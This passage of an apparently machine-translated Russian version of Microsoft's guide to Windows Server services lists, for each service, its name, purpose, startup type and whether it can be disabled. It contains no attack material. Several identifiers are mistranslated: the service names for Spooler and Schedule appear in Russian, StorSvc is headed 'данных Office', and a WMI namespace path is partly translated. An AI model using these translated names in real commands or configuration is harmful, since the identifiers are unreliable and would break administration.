Description Обеспечивает механизм управления виртуальной машиной через PowerShell с помощью сеанса виртуальной машины без виртуальной сети.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии См. сведения о службе HvHost

Служба виртуализации удаленных рабочих столов Hyper-V

Имя Описание
Имя службы vmicrdv
Description Служба предоставляет платформу для обмена данными между виртуальной машиной и операционной системой физического компьютера.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии См. сведения о службе HvHost

Служба синхронизации времени Hyper-V

Имя Описание
Имя службы vmictimesync
Description Синхронизирует системное время виртуальной машины с системным временем физического компьютера.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии См. сведения о службе HvHost

Служба запросов на теневое копирование томов Hyper-V

Имя Описание
Имя службы vmicvss
Description Согласовывает обмен данными, необходимыми при использовании службы теневого копирования томов для резервного копирования приложений и данных на этой виртуальной машине с операционной системы физического компьютера.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии См. сведения о службе HvHost

Модули ключей IPsec для обмена ключами в Интернете и протокола IP с проверкой подлинности

Имя Описание
Имя службы IKEEXT
Description Служба IKEEXT содержит модули для работы с ключами по протоколу IKE и AuthIP. Эти модули для работы с ключами используются при проверке подлинности и обмене ключами в протоколе безопасности IP (IPsec). Остановка или отключение службы IKEEXT ведет к отключению обмена ключами IKE и AuthIP с одноранговыми компьютерами. Как правило, IPsec настроен на использование IKE или AuthIP. Таким образом, остановка или отключение службы IKEEXT может привести к сбою в работе IPsec и поставить под угрозу безопасность системы. Настоятельно рекомендуется, чтобы служба IKEEXT была включена.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Обнаружение интерактивных служб

Имя Описание
Имя службы UI0Detect
Description Уведомляет пользователя о необходимости пользовательского ввода для интерактивных служб, чтобы получить доступ к диалоговым окнам, создаваемым интерактивными службами по мере их появления. Если эта служба будет остановлена, уведомления о новых диалоговых окнах интерактивных служб не будут работать и, вероятно, доступ к этим диалоговым окнам будет невозможен. Если эта служба отключена, ни уведомления о новых диалоговых окнах интерактивных служб, ни доступ к этим окнам не будут работать.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Общий доступ к подключению к Интернету (ICS)

Имя Описание
Имя службы SharedAccess
Description Предоставляет службы преобразования сетевых адресов, адресации, разрешения имен и предотвращения вторжения для домашней сети или сети небольшого офиса.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Требуется для клиентов, используемых в качестве точек доступа Wi-Fi, а также на обоих концах проекции Miracast. ICS можно заблокировать с помощью параметра объекта групповой политики «Запрет использования общего интернет-подключения в DNS-домене»

Вспомогательная служба IP

Имя Описание
Имя службы iphlpsvc
Description Обеспечивает возможность туннельного подключения с помощью технологий туннелирования для IPv6 (6to4, ISATAP, Port Proxy и Teredo) и IP-HTTPS. Если эта служба остановлена, компьютер не будет иметь преимуществ расширенного подключения, которые предлагают эти технологии.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Агент политики IPsec

Имя Описание
Имя службы PolicyAgent
Description Служба IPsec поддерживает одноранговую проверку подлинности на уровне сети, проверку подлинности источника данных, проверку целостности данных, их конфиденциальность (шифрование) и защиту от повторения. Эта служба вводит в действие политики IPsec, созданные с помощью оснастки «Политики IP-безопасности» или программы командной строки «netsh ipsec». Остановка этой службы может привести к возникновению проблем с сетевыми подключениями, если политика требует, чтобы соединения использовали IPsec. Кроме того, если эта служба остановлена, то удаленное управление брандмауэром Windows недоступно.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба прокси-сервера KDC (KPS)

Имя Описание
Имя службы KPSSVC
Description Служба прокси-сервера KDC работает на пограничных серверах для передачи сообщений протокола Kerberos на контроллеры домена в корпоративной сети.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

KtmRm для координатора распределенных транзакций

Имя Описание
Имя службы KtmRm
Description Координирует транзакции между координатором распределенных транзакций (MSDTC) и диспетчером транзакций ядра (KTM). Если эта служба не требуется, рекомендуется не запускать ее. Если она потребуется, MSDTC и KTM автоматически запустят ее. Если служба отключена, то при взаимодействии MSDTC с диспетчером транзакций ядра будут возникать ошибки и запуск всех служб, явно зависящих от нее, станет невозможным.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Модуль сопоставления обнаружения топологии на уровне ссылок

Имя Описание
Имя службы lltdsvc
Description Создает карту сети, состоящую из сведений о топологии (подключении) ПК и устройств, а также метаданных, описывающих каждый ПК и устройство. Если служба отключена, карта сети не будет работать должным образом.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Можно отключить, если нет зависимостей от карты сети.

Диспетчер локальных сеансов

Имя Описание
Имя службы LSM
Description Основная служба Windows, которая управляет сеансами локального пользователя. Остановка или отключение этой службы приведет к нестабильности работы системы.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Стандартная служба сборщика центра диагностики Microsoft (R)

Имя Описание
Имя службы diagnosticshub.standardcollector.service
Description Стандартная служба сборщика центра диагностики. Если эта служба запущена, она собирает данные о событиях трассировки событий в реальном времени и обрабатывает их.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Помощник по входу в учетную запись Майкрософт

Имя Описание
Имя службы wlidsvc
Description Обеспечивает вход в систему на основе служб удостоверений учетных записей Майкрософт. Если эта служба остановлена, пользователи не смогут входить на компьютер с помощью своих учетных записей Майкрософт.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Учетные записи Майкрософт недоступны на Windows Server

Клиент Microsoft App-V

Имя Описание
Имя службы AppVClient
Description Управляет виртуальными приложениями и пользователями App-V
Установка Только с возможностями рабочего стола
Тип запуска Выключено
Рекомендация Уже отключена
Комментарии нет

Служба инициатора Microsoft iSCSI

Имя Описание
Имя службы MSiSCSI
Description Управление сеансами Internet SCSI (iSCSI) между компьютером и удаленными целевыми устройствами iSCSI. Если эта служба остановлена, компьютер не сможет выполнить вход в систему или получить доступ к целевым устройствам iSCSI. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии Наши диагностические данные указывают, что служба используется в клиенте, а также на сервере. Отключение не имеет смысла.

Microsoft Passport

Имя Описание
Имя службы NgcSvc
Description Обеспечивает изоляцию процесса для криптографических ключей, используемых для проверки подлинности в связанных поставщиках удостоверений пользователя. Если эта служба отключена, все варианты использования этих ключей и управления ими не будут доступны, включая вход в систему компьютера и единый вход для приложений и веб-сайтов. Эта служба запускается и останавливается автоматически. Рекомендуется не перенастраивать эту службу.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Необходима для входа с помощью PIN или Hello, которые не поддерживаются на сервере

Контейнер службы Microsoft Passport

Имя Описание
Имя службы NgcCtnrSvc
Description Управляет ключами удостоверений локальных пользователей, используемыми для проверки подлинности пользователя в системах поставщиков удостоверений, а также виртуальными смарт-картами TPM. Если эта служба отключена, ключи удостоверений локальных пользователей и виртуальные смарт-карты TPM будут недоступны. Рекомендуется не перенастраивать эту службу.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Поставщик теневых копий программного обеспечения Майкрософт

Имя Описание
Имя службы swprv
Description Управляет программным созданием теневых копий службой теневого копирования тома. Если эта служба остановлена, то управление программным созданием теневых копий невозможно. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

SMP пространств хранения Майкрософт

Имя Описание
Имя службы smphost
Description Хост-служба для поставщика управления дисковыми пространствами Майкрософт. Если эта служба остановлена ​​или отключена, дисковыми пространствами нельзя управлять.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии API управления хранилищем не работают без этой службы. Пример: Get-WmiObject -class MSFT_Disk -Namespace Root\Microsoft\Windows\служба хранилища.

Служба совместного использования портов Net.Tcp

Имя Описание
Имя службы NetTcpPortSharing
Description Предоставляет возможность совместного использования TCP-портов по протоколу net.tcp.
Установка Всегда устанавливается
Тип запуска Выключено
Рекомендация Уже отключена
Комментарии нет

Netlogon

Имя Описание
Имя службы Netlogon
Description Эта служба обеспечивает безопасный канал между данным компьютером и контроллером домена, служащий для аутентификации пользователей и служб. Если служба остановлена, компьютер не сможет проверять подлинность пользователей и служб, а контроллер домена не сможет регистрировать записи DNS. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Брокер сетевого подключения

Имя Описание
Имя службы NcbService
Description Выполняет функции посредника для подключений, благодаря чему приложения Microsoft Store могут получать уведомления из Интернета.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Сетевые подключения

Имя Описание
Имя службы Netman
Description Управляет объектами папки »Сеть и удаленный доступ к сети», отображающей подключения к локальной сети и подключения удаленного доступа.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Ассистент по сетевым подключениям

Имя Описание
Имя службы NcaSvc
Description Предоставляет уведомление о состоянии DirectAccess для компонентов пользовательского интерфейса.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба списка сетей

Имя Описание
Имя службы netprofm
Description Определяет сети, к которым подключен компьютер, собирает и хранит данные о свойствах этих сетей и оповещает приложения об изменении этих свойств.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба сведений о подключенных сетях

Имя Описание
Имя службы NlaSvc
Description Собирает и сохраняет сведения о конфигурации сети и уведомляет программы при изменении этих сведений. Если эта служба будет остановлена, сведения о конфигурации могут стать недоступными. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба настройки сети

Имя Описание
Имя службы NetSetupSvc
Description Служба настройки сети управляет установкой сетевых драйверов и разрешает конфигурацию низкоуровневых параметров сети. В случае остановки этой службы все выполняемые установки драйверов могут быть отменены.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба интерфейса сохранения сети

Имя Описание
Имя службы nsi
Description Эта служба отправляет сетевые уведомления (например, о добавлении или удалении интерфейса и т. п.) клиентам пользовательских режимов. Остановка этой службы вызовет отключение от сети. При отключении данной службы явно зависимые от нее службы не смогут быть запущены.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Автономные файлы

Имя Описание
Имя службы CscService
Description Служба автономных файлов выполняет работу по обслуживанию кэша автономных файлов, отвечает на события входа пользователя в систему и выхода его из системы, реализует свойства общих API и отсылает интересующимся работой автономных файлов и изменениями состояния кэша нужные им события.
Установка Только с возможностями рабочего стола
Тип запуска Выключено
Рекомендация Уже отключена
Комментарии нет

Оптимизация дисков

Имя Описание
Имя службы defragsvc
Description Помогает компьютеру работать более эффективно, оптимизируя файлы на дисках хранения.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Узел библиотеки DLL счетчика производительности

Имя Описание
Имя службы PerfHost
Description Позволяет удаленным пользователям и 64-разрядным процессам запрашивать счетчики производительности, предоставляемые 32-разрядными библиотеками. Если эта служба остановлена, только локальные пользователи и 32-разрядные процессы смогут запрашивать счетчики производительности, предоставляемые 32-разрядными библиотеками DLL.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Журналы и оповещения о производительности

Имя Описание
Имя службы pla
Description Служба журналов и оповещений о производительности собирает данные с локальных и удаленных компьютеров соответственно заданным параметрам расписания, а затем записывает данные в журнал или выдает оповещение. Если эта служба остановлена, все сведения о производительности не собираются. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба телефонной связи

Имя Описание
Имя службы PhoneSvc
Description Управляет состоянием телефонии на устройстве
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Используется современными приложениями VoIP

Plug and Play

Имя Описание
Имя службы PlugPlay
Description Позволяет компьютеру распознавать изменения аппаратной части и адаптироваться к ним практически без участия пользователя. Остановка или отключение этой службы приведет к нестабильности работы системы.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба перечислителя переносных устройств

Имя Описание
Имя службы WPDBusEnum
Description Применяет групповую политику для съемных запоминающих устройств. Позволяет приложениям, таким как проигрыватель Windows Media и мастер импорта изображений, передавать и синхронизировать содержимое с помощью съемных запоминающих устройств.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Power

Имя Описание
Имя службы Power
Description Управляет политикой электропитания и доставки уведомлений на основе этой политики.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Диспетчер очереди печати

Имя Описание
Имя службы Диспетчера очереди печати
Description Эта служба позволяет ставить задания печати в очередь и обеспечивает взаимодействие с принтером. Если ее отключить, вы не сможете выполнять печать и видеть свои принтеры.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Можно отключить, если не используется на сервере печати или на контроллере домена
Комментарии На контроллере домена установка роли контроллера домена добавляет в службу диспетчера очереди печати поток, который отвечает за удаление устаревших объектов очереди печати из Active Directory. Если служба диспетчера очереди печати не работает хотя бы на одном контроллере домена в каждом сайте, то у AD нет средств для удаления старых очередей, которые больше не существуют. «Отключение ненужных служб? Слово на мудрый » — Microsoft Tech Community — Спросите блог группы производительности.

Расширения и уведомления для принтера

Имя Описание
Имя службы PrintNotify
Description Эта служба открывает пользовательские диалоговые окна принтера и обрабатывает уведомления с удаленного сервера печати или принтера. Если вы отключите эту службу, вы не сможете видеть расширения или уведомления для принтера.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Можно отключить, если не используется на сервере печати
Комментарии нет

Поддержка панели управления «Отчеты о проблемах и их решениях»

Имя Описание
Имя службы wercplsupport
Description Эта служба обеспечивает поддержку просмотра, отправки и удаления отчетов о проблемах системного уровня для панели управления «Отчеты о проблемах и их решениях».
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба «Помощник по совместимости программ»

Имя Описание
Имя службы PcaSvc
Description Обеспечивает поддержку помощника по совместимости программ. Он следит за программами, устанавливаемыми и запускаемыми пользователем, и обнаруживает известные проблемы, связанные с совместимостью. Если остановить данную службу, то помощник по совместимости программ будет работать неправильно.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Можно отключить
Комментарии нет

qWave;

Имя Описание
Имя службы QWAVE
Description Quality Windows Audio Video Experience (qWave) — сетевая платформа для приложений потоковой передачи аудио и видео в домашних сетях на основе IP-протокола. Платформа qWave обеспечивает более высокую производительность и надежность потоковой передачи аудио и видео, обеспечивая необходимое качество обслуживания сети для аудио- и видеоприложений. Платформа содержит механизмы управления доступом, отслеживания и принудительного выполнения, получения данных приложений и установки приоритета трафика.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Служба качества обслуживания на стороне клиента

Служба управления радио

Имя Описание
Имя службы RmSvc
Description Служба управления радио и режимом «в самолете»
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Диспетчер автоматических подключений удаленного доступа

Имя Описание
Имя службы RasAuto
Description Создает соединение с удаленной сетью всякий раз, когда программа ссылается на имя или адрес удаленного DNS-сервера или NetBIOS.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Диспетчер подключений удаленного доступа

Имя Описание
Имя службы RasMan
Description Управляет подключениями удаленного доступа и подключениями виртуальной частной сети (VPN) с этого компьютера к Интернету или к другим удаленным сетям. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Настройка удаленного рабочего стола

Имя Описание
Имя службы SessionEnv
Description Служба настройки сервера удаленных рабочих столов (RDCS) отвечает за все действия, связанные с настройкой и обслуживанием сеансов служб удаленных рабочих столов и удаленного доступа, для которых необходим контекст SYSTEM. Это касается временных папок сеансов, тем и сертификатов удаленных рабочих столов.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии нет

Службы удаленного рабочего стола

Имя Описание
Имя службы TermService
Description Разрешает пользователям интерактивно подключаться к удаленному компьютеру. Удаленный рабочий стол и сервер узла сеансов удаленных рабочих столов зависят от данной службы. Чтобы запретить удаленное использование этого компьютера, необходимо снять флажки на вкладке «Удаленный доступ» элемента «Свойства системы» панели управления.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии нет

Перенаправитель портов пользовательского режима служб удаленных рабочих столов

Имя Описание
Имя службы UmRdpService
Description Позволяет перенаправлять принтеры, драйверы или порты для подключений по протоколу удаленного рабочего стола.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии Поддерживает перенаправления на стороне сервера соединения.

Удаленный вызов процедур (RPC)

Имя Описание
Имя службы RpcSs
Description Служба RPCSS — это диспетчер управления службами для серверов COM и DCOM. Она выполняет запросы активации объектов, разрешение экспортера объектов и распределенный сбор мусора для этих серверов. Если эта служба остановлена ​​или отключена, программы, использующие COM или DCOM, не будут работать должным образом. Отключать службу RPCSS не рекомендуется.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Локатор удаленного вызова процедур (RPC)

Имя Описание
Имя службы RpcLocator
Description В Windows 2003 и более ранних версиях Windows служба локатора удаленного вызова процедур (RPC) управляет базой данных службы имен RPC. В Windows Vista и более поздних версиях Windows эта служба не предоставляет никаких функций и присутствует для совместимости приложений.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Удаленный реестр

Имя Описание
Имя службы RemoteRegistry
Description Позволяет удаленным пользователям изменять параметры реестра на этом компьютере. Если эта служба остановлена, реестр могут изменять только пользователи на этом компьютере. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Не отключать
Комментарии нет

Поставщик результирующей политики

Имя Описание
Имя службы RSoPProv
Description Сетевая служба, обрабатывающая запросы на имитацию применения параметров групповой политики для конечного пользователя или компьютера в различных ситуациях и вычисляющая параметры результирующей политики.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Маршрутизация и удаленный доступ

Имя Описание
Имя службы RemoteAccess
Description Предоставляет службы маршрутизации для предприятий в локальной и глобальной сети.
Установка Всегда устанавливается
Тип запуска Выключено
Рекомендация Уже отключена
Комментарии Уже отключена

Сопоставитель конечных точек RPC

Имя Описание
Имя службы RpcEptMapper
Description Разрешает идентификаторы интерфейсов RPC для транспортировки конечных точек. Если эта служба остановлена ​​или отключена, программы, использующие службы удаленного вызова процедур (RPC), не будут работать должным образом.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Вторичный вход в систему

Имя Описание
Имя службы seclogon
Description Позволяет запускать процессы от имени другого пользователя. Если остановить эту службу, этот тип входа в систему будет недоступен. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба SSTP

Имя Описание
Имя службы SstpSvc
Description Обеспечивает поддержку протокола SSTP для подключения к удаленным компьютерам с использованием VPN. При отключении данной службы пользователи не смогут использовать SSTP для доступа к удаленным серверам.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии Отключение прерывает работу RRAS

Диспетчер учетных записей безопасности

Имя Описание
Имя службы SamSs
Description Запуск этой службы сообщает другим службам, что диспетчер учетных записей безопасности (SAM) готов к приему запросов. При отключении данной службы другие службы в системе не получат уведомления о готовности SAM, что, в свою очередь, может помешать корректному запуску этих служб. Не следует отключать эту службу.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Не отключать
Комментарии нет

Служба данных датчиков

Имя Описание
Имя службы SensorDataService
Description Предоставляет данные от различных датчиков
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Служба наблюдения за датчиками

Имя Описание
Имя службы SensrSvc
Description Ведет наблюдение за различными датчиками для предоставления доступа к данным и адаптации к системному и пользовательскому состоянию. В случае остановки или отключения этой службы корректировка яркости дисплея в соответствии с освещенностью не производится. Остановка этой службы также может повлиять на другие функции и компоненты системы.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Служба датчиков

Имя Описание
Имя службы SensorService
Description Служба, которая управляет функциями разных датчиков. Управляет простой ориентацией устройства (SDO) и журналом датчиков. Загружает простой датчик ориентации устройства, который передает сведения об изменениях в ориентации устройства. Если эта служба остановлена или отключена, простой датчик ориентации устройства не будет загружаться и автоповорот не будет работать. Наполнение журнала с датчиков также будет прекращено.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Сервер

Имя Описание
Имя службы LanmanServer
Description Поддерживает совместное использование файлов, печати и именованных каналов по сети для этого компьютера. Если эта служба остановлена, эти функции будут недоступны. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Не отключать
Комментарии Необходима для удаленного управления, IPC$, совместного использования файлового ресурса SMB

Определение оборудования оболочки

Имя Описание
Имя службы ShellHWDetection
Description Предоставляет уведомления об аппаратных событиях автозапуска.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Можно отключить
Комментарии нет

Смарт-карта

Имя Описание
Имя службы SCardSvr
Description Управляет доступом к смарт-картам, считываемым этим компьютером. Если эта служба остановлена, этот компьютер не сможет считывать смарт-карты. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Выключено
Рекомендация Уже отключена
Комментарии нет

Служба перечисления устройств чтения смарт-карт

Имя Описание
Имя службы ScDeviceEnum
Description Создает узлы программного устройства для всех устройств чтения смарт-карт, доступных для этого сеанса. Если эта служба отключена, API WinRT не смогут перечислять устройства чтения смарт-карт.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Требуется почти исключительно для приложений WinRT

Политика удаления смарт-карт

Имя Описание
Имя службы SCPolicySvc
Description Позволяет настроить систему для блокировки рабочего стола пользователя после удаления смарт-карты.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Ловушка SNMP

Имя Описание
Имя службы SNMPTRAP
Description Принимает сообщения перехвата, созданные локальными или удаленными агентами SNMP и пересылает их программам управления SNMP, запущенным на этом компьютере. Если эта служба остановлена, программы на основе SNMP на этом компьютере перестанут получать сообщения перехвата. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Защита программного обеспечения

Имя Описание
Имя службы sppsvc
Description Позволяет скачивать, устанавливать и применять цифровые лицензии для Windows и приложений Windows. Если служба отключена, операционная система и лицензионные приложения могут работать в режиме уведомлений. Настоятельно рекомендуется не отключать службу защиты программного обеспечения.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Модуль поддержки специальной консоли администрирования

Имя Описание
Имя службы sacsvr
Description Позволяет администраторам получать удаленный доступ к командной строке с помощью служб аварийного управления.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Быстрая проверка

Имя Описание
Имя службы svsvc
Description Проверяет потенциальные повреждения файловой системы.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Обнаружение SSDP

Имя Описание
Имя службы SSDPSRV
Description Обнаруживает сетевые устройства и службы, использующие протокол обнаружения SSDP, такие как устройства UPnP. Кроме того, объявляет устройства и службы SSDP, работающие на локальном компьютере. Если эта служба остановлена, обнаружение устройств, использующих SSDP, не будет выполняться. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Служба репозитория состояний

Имя Описание
Имя службы StateRepository
Description Обеспечивает необходимую поддержку инфраструктуры для модели приложения.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

События получения неподвижных изображений

Имя Описание
Имя службы WiaRpc
Description Запускает приложения, связанные с событиями получения неподвижных изображений.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

данных Office

Имя Описание
Имя службы StorSvc
Description Активирует службу по настройке хранилища и расширению внешнего хранилища.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Управление уровнями хранилища

Имя Описание
Имя службы TieringEngineService
Description Оптимизирует размещение данных на уровнях хранилища во всех многоуровневых пространствах хранения в системе.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Superfetch

Имя Описание
Имя службы SysMain
Description Поддерживает и улучшает производительность системы с течением времени.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Sync Host

Имя Описание
Имя службы OneSyncSvc
Description Служба синхронизирует почту, контакты, календарь и различные другие пользовательские данные. Почта и другие приложения, зависящие от этого компонента, не будут работать должным образом, когда эта служба не запущена.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Можно отключить
Комментарии Шаблон пользовательской службы

Служба уведомления о системных событиях

Имя Описание
Имя службы SENS
Description Отслеживает системные события и уведомляет подписчиков системы событий COM+ об этих событиях.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Брокер системных событий

Имя Описание
Имя службы SystemEventsBroker
Description Координирует выполнение фоновой работы для приложения WinRT. Если эта служба остановлена ​​или отключена, фоновые задачи могут не запускаться.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Не отключать
Комментарии Несмотря на то что ее описание подразумевает, что служба предназначена только для приложений WinRT, она необходима для планировщика задач, службы инфраструктуры брокера и других внутренних компонентов.

Планировщик заданий

Имя Описание
Имя службы Расписание
Description Позволяет настраивать и задавать расписание автоматического выполнения задач на этом компьютере. Эта служба также отвечает за выполнение нескольких критически важных системных задач Windows. Если эта служба остановлена или отключена, эти задачи не будут выполняться в запланированное время. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Вспомогательное приложение для NetBIOS TCP/IP

Имя Описание
Имя службы lmhosts
Description Осуществляет поддержку службы NetBIOS через TCP/IP (NetBT) и разрешение имен NetBIOS для клиентов в сети, позволяя пользователям получать общий доступ к файлам, принтерам, а также подключаться к сети. Если эта служба остановлена, эти функции могут быть недоступны. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Телефония

Имя Описание
Имя службы TapiSrv
Description Обеспечивает поддержку API телефонии (TAPI) для программ, которые управляют устройствами телефонии на локальном компьютере и через локальную сеть на серверах, на которых также работает служба.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Не отключать
Комментарии Отключение прерывает работу RRAS

Themes

Имя Описание
Имя службы Themes
Description Обеспечивает управление темой пользовательского интерфейса.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Не отключать
Комментарии Невозможно установить специализированные темы, когда эта служба отключена

Сервер моделей данных плиток

Имя Описание
Имя службы tiledatamodelsvc
Description Сервер плиток для обновления плиток.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Не отключать
Комментарии Меню «Пуск» прекращает работу, если эта служба отключена

Брокер событий времени

Имя Описание
Имя службы TimeBrokerSvc
Description Координирует выполнение фоновой работы для приложения WinRT. Если эта служба остановлена ​​или отключена, фоновые задачи могут не запускаться.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии Несмотря на то что ее описание подразумевает, что служба предназначена только для приложений WinRT, она необходима для планировщика задач, службы инфраструктуры брокера и других внутренних компонентов.

Служба сенсорной клавиатуры и панели рукописного ввода

Имя Описание
Имя службы TabletInputService
Description Обеспечивает функционирование пера и рукописного ввода для сенсорной клавиатуры и панели рукописного ввода.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии нет

Служба оркестратора обновлений для Центра обновления Windows

Имя Описание
Имя службы UsoSvc
Description Управляет обновлениями Windows. В случае остановки службы ваши устройства не смогут скачивать и устанавливать последние обновления.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии Описание службы отсутствовало в версии 1607. Клиентский компонент Центра обновления Windows (включая WSUS) зависит от этой службы.

Узел универсальных PNP-устройств

Имя Описание
Имя службы upnphost
